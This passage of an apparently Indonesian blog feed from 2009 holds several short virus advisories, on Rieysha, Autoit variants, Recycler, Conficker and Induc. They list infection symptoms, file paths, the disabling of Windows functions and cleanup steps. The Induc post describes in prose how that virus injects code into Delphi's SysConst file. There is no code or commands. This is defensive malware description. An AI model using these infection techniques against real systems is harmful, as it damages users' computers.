src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-2773011053483010578</id><published>2009-10-28T23:09:00.000-07:00</published><updated>2009-10-28T23:15:37.485-07:00</updated><title type='text'>W32/VBTroj.VNE Rieysha</title><content type='html'>Jika komputer anda menampilkan pesan notepad dengan nama file "system32pesan_dari_rieysha.txt" sebagai berikut :&lt;br /&gt;&lt;br /&gt;sayang kapan kamu kembali ke indonesia?&lt;br /&gt;apa kamu kembali dengan hatimu yang dulu?&lt;br /&gt;&lt;br /&gt;by:rieysha&lt;br /&gt;&lt;br /&gt;Anda jangan buru-buru senang atau  GR, apalagi anda buru-buru kembali ke Indonesia. Karena anda bukan mendapatkan pesan dari Rieysha, melainkan komputer anda terinfeksi virus W32/VBTroj.VNE.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Begitu pula jika pesan tersebut muncul di file MS Word anda dengan nama "system32pesan.doc" dengan pesan  :&lt;br /&gt;yanx kapan kamu balik?&lt;br /&gt;aku sudah kangen berat nih&lt;br /&gt;kenapa sih mesti pergi jauh dariku&lt;br /&gt;apa kamu kembali dengan hatimu yang dulu&lt;br /&gt;apa aku akan merasakan kehangatan cinta yang dulu&lt;br /&gt;&lt;br /&gt;Setelah sebelumnya muncul virus dengan nama W32/VBTroj.AOQB atau lebih dikenal dengan nama virus Nadia Saphira yang merupakan reinkarnasi dari virus Donal Bebek, kini telah muncul virus baru dengan nama W32/VBTroj.VNE atau lebih dikenal dengan nama virus [Rieysha]. Virus ini juga menggunakan nama acak untuk menamai filenya, salah satunya adalah ikut2an mencatut nama NadiaSafira.exe sebagai nama filenya. Namun jika dilihat dari aksinya virus reinkarnasi Rieysha yang satu ini lebih ganas dibandingkan virus Nadia Saphira W32/VBTroj.AOQB.&lt;br /&gt;&lt;br /&gt;Untuk informasi lebih jauh mengenai virus Nadia Saphira, klik url berikut:&lt;br /&gt;&lt;a href="http://www.vaksin.com/2009/0509/nadia%20saphira/nadia%20saphira.html"&gt;http://www.vaksin.com/2009/0509/nadia%20saphira/nadia%20saphira.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Virus ini dibuat dengan menggunakan bahasa Borland Delphi dengan ukuran sekitar 228 KB dan jika dilihat dari pesan yang akan ditampilkan oleh pembuat virus, kemungkinan virus ini berasal dari kota Gudeg tempat asal Mang Engking. Kalau Mang Engking sukses buka restoran dengan menu Udang Galah, maka virus jebolan [Rieysha] ini juga sukses merepotkan korbannya seperti pada virus W32/Delf.DCDW yang pernah dibuat sebelumnya.&lt;br /&gt;&lt;br /&gt;Virus ini lebih mudah di ketahui hanya dengan melihat icon dari file yang menyertainya, yakni menggunakan icon gambar dengan rupa seorang gadis bersanggul seperti terlihat pada gambar dibawah ini : (lihat gambar 3)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ciri-Ciri komputer yang terinfeksi&lt;br /&gt;Mengganti tampilan walpaper/desktop&lt;br /&gt;Ciri-ciri yang dapat dikenali dari virus ini adalah dimana virus ini akan menutup desktop/wallpaper dengan wallpaper dirinya yang berisi pesan error, dengan digantinya walpaper ini maka user sudah tidak bisa mengakses komputer tersebut, jadi pembersihan hanya dapat dilakukan pada mode “DOS” atau dengan menggunakan software lain seperti “Mini PE”&lt;br /&gt;Merubah format penanggalan dari PM/AM menjadi [Rieysha]&lt;br /&gt;Merubah nama Organisasi dan pemilik OS menjadi&lt;br /&gt;- RegisteredOrganization = kamu kembali&lt;br /&gt;- RegisteredOwner = sayang kapan&lt;br /&gt;Disable beberapa fungsi Windows seperti&lt;br /&gt;o    Disable Task Manager&lt;br /&gt;o    Menyembunyikan  menu ShutDown komputer&lt;br /&gt;o    Menyembunyikan Drive&lt;br /&gt;o    Mengaktifkan fungsi Autorun, agar virus dapat aktif secara otomatis pada saat user mengakses Drive/Flash Disk&lt;br /&gt;o    Menyembunyikan fungsi pencarian file/folder [Search]&lt;br /&gt;o    Menyembunyikan [Folder Options]&lt;br /&gt;o    Menyembunyikan [Run]&lt;br /&gt;o    Menyembunyikan [Start Menu Programs]&lt;br /&gt;&lt;br /&gt;Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai W32/VBTroj.VNE.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-2773011053483010578?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/2773011053483010578/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/w32vbtrojvne-rieysha.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2773011053483010578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2773011053483010578'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/w32vbtrojvne-rieysha.html' title='W32/VBTroj.VNE Rieysha'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-6426522887137441593</id><published>2009-10-27T23:55:00.001-07:00</published><updated>2009-10-27T23:56:11.828-07:00</updated><title type='text'>Autoit-Hubbun</title><content type='html'>Virus lokal yang ingin mengikuti jejak Autoit, karena menggunakan aplikasi scripting Autoit dalam pembuatannya. Ia menggunakan icon folder dalam penyebarannya. File induknya berada pada direktori \Windows\System32\wbem\services.exe. Virus ini juga menciptakan file hubbun.txt yang berisi pesan dari si pembuat. Ia masih banyak memiliki bug, terlihat dalam aksinya beberapa kali menampilkan kesalahan pada script.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-6426522887137441593?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/6426522887137441593/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/autoit-hubbun.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6426522887137441593'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6426522887137441593'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/autoit-hubbun.html' title='Autoit-Hubbun'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-3729404305594573738</id><published>2009-10-27T23:54:00.000-07:00</published><updated>2009-10-27T23:55:21.061-07:00</updated><title type='text'>Autoit virus</title><content type='html'>Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-3729404305594573738?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/3729404305594573738/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/autoit-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/3729404305594573738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/3729404305594573738'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/autoit-virus.html' title='Autoit virus'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-4842911135211127823</id><published>2009-10-27T23:53:00.000-07:00</published><updated>2009-10-27T23:54:36.037-07:00</updated><title type='text'>Recycler</title><content type='html'>Seperti pendahulunya, yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya. Pada Build3 kali ini, telah disertakan engine cleaner khusus yang dapat membasmi varian Recycler tersebut dengan tuntas. Silakan scan komputer secara menyeluruh, basmi setiap virus yang ditemukan, dan jangan lupa untuk me-restart komputer Anda.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-4842911135211127823?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/4842911135211127823/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/recycler.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/4842911135211127823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/4842911135211127823'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/recycler.html' title='Recycler'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-1369434804904671717</id><published>2009-10-27T23:52:00.000-07:00</published><updated>2009-10-27T23:53:07.799-07:00</updated><title type='text'>Conflicker</title><content type='html'>Virus luar berteknologi canggih ini memang menyebar luar biasa. Bentuknya yang merupakan file DLL (Dynamic Link Library) membedakannya dengan kebanyakan virus lain yang berupa EXE. Kemampuan yang dimilikinya juga bisa disetarakan dengan rootkit. Serta, sifatnya ber-polymorphic membuatnya memiliki tubuh yang berubah-ubah. Pada komputer terinfeksi, user tidak akan dapat membuka situs yang “berbau” antivirius atau Microsoft update. Virus ini juga aktif menyebar di Indonesia dengan menggunakan media removable disk misalkan flash disk. Pada flash disk terinfeksi, Anda akan menemukan file autorun.inf dan direktori RECYCLER yang di dalamnya terdapat sub-direktori dengan nama misalkan S-5-3-42-2819952290-8240758988-879315005-3665, dan pada direktori inilah terdapat file virus Conficker dengan nama biasanya jwgkvsq.vmx yang sebenarnya adalah file DLL.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-1369434804904671717?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/1369434804904671717/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/conflicker.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1369434804904671717'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1369434804904671717'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/conflicker.html' title='Conflicker'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-7464299966317293577</id><published>2009-10-27T23:47:00.001-07:00</published><updated>2009-10-27T23:51:44.279-07:00</updated><title type='text'>Virus Induc</title><content type='html'>&lt;a href="http://www.sendspace.com/file/5cb7gx" target="_blank"&gt;&lt;/a&gt;Apabila ada di antara Anda sekalian yang menggunakan PCMAV seri 2.1x bersamaan dengan antivirus lain dalam satu PC, dan mendapatkan warning bahwa file PCMAV mengandung kode virus Induc, tidak perlu khawatir.&lt;a id="more-476"&gt;&lt;/a&gt;&lt;br /&gt;Virus ini HANYA bisa aktif di komputer yang terinstal compiler Delphi versi 4-7 yang biasa terdapat di komputer kalangan developer/programmer Delphi. Dengan kata lain, di komputer pada umumnya virus ini tidak dapat aktif. Virus yang mengincar programmer/developer atau software house yang menggunakan Delphi ini sebenarnya tidaklah mematikan seperti halnya yang digembar-gemborkan oleh beberapa situs.&lt;br /&gt;Virus ini dibuat hanya untuk menumpangi setiap aplikasi yang dibuat menggunakan Delphi. Cara kerjanya adalah dengan mencari tahu apakah di komputer tersebut terdapat aplikasi Delphi versi 4-7. Jika ada, ia kemudian mencari file SysConst.pas bawaan Delphi untuk diinjeksikan “code” yang masih benar-benar dalam bentuk source code. Lalu, file SysConst.pas di-compile agar menghasilkan file SysConst.dcu. Sementara file SysConst.dcu yang asli di-rename oleh virus tersebut menjadi SysConst.bak. File yang telah terkontaminasi virus dapat ditemukan pada direktori \Program Files\Borland\DelphiX\Lib, dimana X menunjukan versi Delphi.&lt;br /&gt;Apa yang terjadi jika virus ini aktif?Tentu saja, setiap aplikasi yang dibuat menggunakan Delphi akan ditumpangi oleh kode virus ini. Contohnya saat programmer menggunakan unit SysUtils dalam programnya. Tapi, penting untuk Anda ketahui bahwa virus ini hanya bisa menyebarkan dirinya jika di komputer Anda terdapat Delphi versi 4-7 dan dia tidak melakukan tindakan pengrusakan, seperti menghapus file ataupun hal lainnya. Jadi, setiap programmer yang membuat software menggunakan Delphi yang mengandung kode virus ini, maka software tersebut akan dideteksi sebagai virus oleh antivirus, akibatnya software tersebut di-block dan tidak bisa digunakan. Dan tidak bisa dipungkiri, sudah banyak aplikasi yang dibuat dengan Delphi, bahkan yang populer sekalipun, berhasil ditumpangi olehnya. Salah satu yang termasuk di antaranya adalah komponen third-party (pihak ketiga) dari sebuah developer profesional yang digunakan oleh PCMAV generasi 2.1x.&lt;br /&gt;Lalu bagaimana cara membersihkan komputer dari virus ini?Untuk saat ini, tindakan yang bisa dilakukan pada file terinfeksi hanyalah menghapus file hasil kompilasi Delphi. Lalu, lakukan rebuild ulang terhadap seluruh aplikasi yang dibuat menggunakan Delphi yang terinfeksi. Namun sebelum melakukan rebuild atau compile ulang, Anda perlu untuk memperbaiki file SysConst.dcu yang telah terinfeksi. Caranya, cukup hapus file SysConst.dcu, lalu copy file SysConst.bak menjadi SysConst.dcu. Dan biarkan saja file SysConst.bak, agar komputer Anda tidak terinfeksi lagi. Kesemua file tersebut dapat Anda temukan pada direktori program Delphi, default-nya di “\Program Files\Borland\DelphiX\Lib”, dimana X menunjukan versi Delphi. Cara termudah, lakukan scan menggunakan PCMAV Express for Induc untuk mengatasi virus ini dengan tuntas. Dan terakhir, silakan kontak pembuat software tersebut dan beritahukan bahwa softwarenya telah ditumpangi oleh kode virus Induc.&lt;br /&gt;Sekali lagi, tidak perlu khawatir berlebihan. Selama Anda bukan seorang programmer/developer Delphi dan tidak menggunakan compiler Delphi versi 4-7 di komputer Anda, maka dipastikan virus ini tidak akan pernah dapat aktif.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-7464299966317293577?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/7464299966317293577/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/virus-induc.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7464299966317293577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7464299966317293577'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/virus-induc.html' title='Virus Induc'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
